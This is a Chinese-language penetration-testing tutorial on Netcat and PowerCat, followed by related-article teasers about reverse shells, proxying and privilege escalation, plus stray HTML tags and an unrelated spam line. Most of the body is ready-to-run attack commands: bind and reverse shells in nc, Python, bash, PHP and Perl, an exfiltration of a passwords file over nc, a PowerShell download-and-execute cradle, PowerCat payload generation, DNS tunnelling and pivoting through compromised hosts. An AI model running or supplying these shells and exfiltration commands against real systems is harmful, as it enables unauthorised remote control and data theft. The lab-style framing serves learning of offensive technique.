<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Netcat、PowerCat用法詳解

    VSole2022-07-11 06:49:16

    簡易使用

    Banner抓取

    Banner抓取是一種在開放端口上檢索關于特定服務信息的技術,在滲透測試中用于漏洞的評估

    執行以下命令,可以得知目標主機端口運行的服務

    nc -nv  
    

    遠程連接主機

    nc -nvv  
    

    端口掃描

    掃描指定端口

    nc -v  
    

    掃描指定端口段(速度較慢)

    nc -v -z  -
    

    端口監聽

    監聽本地端口,訪問時輸出到命令行

    nc -l -p 9999
    

    文件傳輸

    在本地服務器生成一個1.txt文件并監聽

    nc -lp 333 >1.txt
    

    在目標主機與服務器333端口建立連接,傳輸一個password文件

    nc -vn 192.168.200.6 333 < passwords.txt -q 1  
    

    簡易聊天

    本地服務器監聽

    nc -l -p 9999
    

    目標主機輸入

    nc -nv 192.168.200.6 9999 
    

    獲取SHELL

    正向shell(客戶端獲取服務器shell)

    控制端主動發起連接去連接被控制端。

    目標主機輸入命令監聽目標主機9999端口

    nc -lvp 9999 -e /bin/sh     //Lunix
    nc -lvp 9999 -e c:\windows\system32\cmd.exe   //Windows
    

    輸入命令在本地或者服務器上連接目標主機的9999端口

    nc 192.168.200.6 9999
    

    反向shell(服務器獲取客戶端shell)

    被控制端主動連接控制端。

    輸入命令在本地或者服務器上監聽9999端口

    nc -lvp 9999
    

    目標主機輸入命令連接服務器9999端口

    nc 192.168.200.6 9999 -e /bin/sh    //Linux
    nc 192.168.200.6 9999 -e c:\windows\system32\cmd.exe    //Windows
    

    在目標主機中沒有nc時獲取反向shell

    一般情況目標主機中是沒有nc的,可以使用其他工具和編程語言代替nc,實現反向連接

    Python反向Shell

    在服務器監聽本地9999端口

    nc -lvp 9999
    

    在目標主機執行如下命令

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.6",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    

    bash反向Shell

    在服務器監聽本地9999端口

    nc -lvp 9999
    

    在目標主機執行如下命令

    bash -c 'exec bash -i >& /dev/tcp/192.168.200.6/9999 0>&1'
    

    PHP反向Shell

    在服務器監聽本地9999端口

    nc -lvp 9999
    

    PHP常用在Web服務器上,是nc,perl和Bash很好的替代品

    php -r '$sock=fsockopen("192.168.200.6",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    Perl反向Shell

    在服務器監聽本地9999端口

    nc -lvp 9999
    

    如果此時目標主機使用的是Perl語言,仍然可以使用Perl來建立反向Shell

    在目標主機運行如下命令

    perl -e 'use Socket;$i="192.168.200.6";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">$S");open(STDOUT,">$S");open(STDERR,">&S");exec("/bin/sh -i");};'
    

    內網代理

    如圖所示,測試環境為:攻擊者服務器( Kali Linux);一個小型內網;三臺服務器。假設獲取了Web服務器的權限,通過 Kali Linux機器不能訪問數據庫服務器( Linux),但通過web服務器可以訪問數據庫服務器( Linux)。測試目標為:獲取數據庫服務器( Linux)的Shell

    首先在服務器輸入如下命令監聽9999端口

    nc -lvp 9999
    

    接著在數據庫服務器執行如下命令

    nc -lvp 9999 -e /bin/sh
    

    最后在Web服務器執行如下命令

    nc -v 192.168.1.4 9999  -c "nc -v 1.1.1.200 9999"
    

    PowerCat

    PowerCat可以說是nc的PowerShell版本,PowerCat可以通過執行命令回到本地運行,也可以使用遠程權限運行powercat(github.com)

    導入powercat輸入Import-Module .\powercat.ps1

    輸入“powercat -h”查看命令提示

    通過nc正向連接PowerCat

    在Windows server 2008服務器上執行監聽命令

    powercat -l -p 8080 -e cmd.exe -v
    

    然后在kali上執行

    netcat 192.168.200.6 8080 -vv
    

    通過nc反向連接PowerCat

    在kali上監聽

    nc -l -p 9999 -vv
    

    在Windows server 2008執行,-c參數用于提供想要連接的IP地址

    powercat -c 192.168.200.6 -p 9999 -v -e cmd.exe
    

    通過PowerCat返回PowerShell

    前面的操作都是可以與nc進行交互。但是,如果想返回PowerShell,則無法與nc進行交互。下面介紹如何讓Windows7和Windows server 2008建立正向連接

    在Win7執行下載命令

    IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/powercat.ps1')
    

    再執行監聽命令

    powercat -l -p 9999 -v  
    

    在Win server 2008執行如下命令 -ep用于返回PowerShell

    powercat -c 192.168.1.3 -p 9999 -v -ep
    

    通過PowerCat傳輸文件

    在win2008新建一個test.txt文件放在c盤根目錄下,在win7執行命令

    powercat -l -p 9999 -of test.txt -v
    

    回到win2008中執行命令

    powercat -c 192.168.1.3 -p 9999 -i c:\test.txt -v
    

    通過PowerCat生成Payload

    用PowerCat生成的Payload也有正向和反向之分,且可以對其進行編碼

    在win2008執行命令生成一個簡單的payload

    powercat -l -p 8000 -e cmd -v -g >> shell.ps1
    

    將生成的ps1文件上傳到win7并執行,然后在win2008上執行如下命令反彈shell

    powercat -c 192.168.1.3 -p 8000 -v
    

    如果想要反彈PowerShell,win2008執行命令

    powercat -l -p 8000 -ep -v -g >> shell.ps1
    

    將生成的ps1文件上傳到win7并執行,然后在win2008上執行如下命令反彈Powershell

    powercat -c 192.168.1.3 -p 8000 -v
    

    PowerCat DNS隧道通信

    PowerCat是一套基于DNS通信的協議,基于dnscat設計的

    使用dnscat,依次執行

    git clone https://github.com/iagox86/dnscat2 
    cd dnscat2/server/
    

    gem install bundler

    bundle install

    在安裝了dnscat的Linux主機上運行

    ruby dnscat2.rb ttpowercat.test -e open --no-cache
    

    返回win2008執行命令

    powercat -c 192.168.200.6 -p 53 -dns ttpowercat.test -e cmd.exe
    

    將PowerCat作為跳板

    測試環境為:三臺主機,其中 Windows Server2008主機可以通過ping命令訪問 Windows7主機和 Kali Linux主機, Kali Linux主機和 Windows7主機之間無法通過網絡連接。測試目標為:將 Windows Server2008主機作為跳板,讓 Kali Linux主機連接Windows7主機。

    首先,在 Windows7中執行如下命令。

    powercat -l -v -p 9999 -e cmd.exe
    

    Windows Server2008中執行如下命令。

    powercat -l -v -p 8000 -r tcp:192.168.1.3:9999
    

    最后,讓 Kali Linux主機與 Windows Server2008主機進行連接,Windows Server2008主機就可以將流量轉發給Windows7了

    nc 192.168.200.24 8000 -vv
    

    shell端口轉發
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    反彈Shell大全與原理
    2023-04-25 10:15:00
    reverse shell與telnet,ssh等標準shell對應,本質上是網絡概念的客戶端與服務端的角色反轉。對方主機在局域網內,從外網無法直接訪問。對方主機上存在WAF,對主動連接發來的請求數據檢測嚴格,而對向外發出的請求不進行檢測或檢測較少。對方由于防火墻等限制,對方機器只能發送請求,不能接收請求。在滲透測試過程中,得到webshell后一般我們會反彈shell。反彈shell原理A主機開啟9090端口的tcp服務
    內網滲透-代理篇
    2021-12-01 05:44:01
    利用代理工具將內網的流量代理到本地進行訪問,這樣就可以對內網進行下一步滲透,同時也可以利用代理工具將其他網段的流量轉發到本地進行縱向滲透。代理的本質是Socks協議(防火墻安全會話換協議),工作在OSI參考模型的第5層(會話層)。使用TCP協議傳輸數據,因而不提供如傳遞ICMP信息之類的網絡層相關服務。目前支持SOCKS4和SOCKS5兩個版本:
    # 此時攻擊機已經獲取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷鍵。$ fg$ reset //這一步我實測有問題,輸了會出問題,不輸也沒有影響,所以如果輸了有問題可以不輸。低權限提權首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
    很早就想專門寫一篇關于內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段:)
    隱藏通信隧道技術常用于在訪問受限的網絡環境中或不受信任的網絡中實現安全的數據傳輸。網絡層:IPV6隧道、ICMP隧道、GRE隧道傳輸層:TCP隧道、UDP隧道、常規端口轉發應用層:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道常規判斷內網連通性的方法都有哪些?
    file=2663◆測試環境:Ubuntu 18.04根據漏洞描述可得到幾個關鍵詞:遠程命令執行、/lan.jsp頁面、Device Name 參數、HTTP、POST、get set cpp。這里應該是一個POST請求提交數據。在文件系統中查找關鍵詞并沒有發現名為“get_set.ccp”的文件,沒有“get_set.ccp”文件,這個URL應該是交給后端處理,處理好之后將結果返回給用戶。在復現這個漏洞中發現2022年剛披露的信息和2023年有所不同,2022年的描述更具體,2023的變得模糊一些。剛開始以為是為了保護廠商,避免提示太明顯容易被利用。
    起因,由于前幾天拿了一個菠菜站的webshell,但是只有iis權限,執行無法創建用戶等操作,更無法對整個服務器進行控制了,于是此時便需要提權了,對于一個剛剛入門的小白來說,此刻真正意識到了提權的重要性,于是便開始學習提取相關知識,以拿下該菠菜的站點。提權前的準備工作1,通常來說,不同的腳本所處的權限是不一樣的。
    藍隊初級防護總結
    2023-01-09 10:11:55
    三. 網站被上傳webshell如何處理?工具方面比如使用D盾webshellkill,河馬webshell查殺,百度在線webshell查殺等工具對網站目錄進行排查查殺,如果是在護網期間可以將樣本備份再進行查殺。堡壘機是針對內部運維人員的運維安全審計系統。WAFWAF是以網站或應用系統為核心的安全產品,通過對HTTP或HTTPS的Web攻擊行為進行分析并攔截,有效的降低網站安全風險。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类